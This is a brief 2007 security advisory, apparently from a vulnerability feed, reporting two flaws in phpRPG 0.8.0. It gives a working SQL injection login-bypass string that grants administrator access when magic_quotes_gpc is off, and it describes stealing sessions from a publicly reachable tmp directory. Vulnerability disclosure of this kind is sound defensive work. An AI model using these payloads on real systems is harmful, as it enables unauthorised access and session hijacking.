PHP RPG - Sql Injection and Session Information Disclosure.

Type securityvulns
Reporter Securityvulns
Modified 2007-12-16T00:00:00


By Michael Brooks Vulneralbity: Sql Injection and Session Information Disclosure. Homepage: Verison affected 0.8.0

There are two flaws that affect this applcation. A nearly vinnella login bypass issues affects phprpg. If magic_qutoes_gpc=off then this will login an attacker as the administrator using this: username:1'or 1=1 limit 1/* password:1 Keep in mind that magic_quotes_gpc is being removed in php6!

The second flaw allows an attacker to steal any session registered by phprpg by navigating to this directory: http://localhost/phpRPG-0.8.0/tmp/ This is because phprpg has manually changed the directory using session_save_path() which is called in init.php on line 49.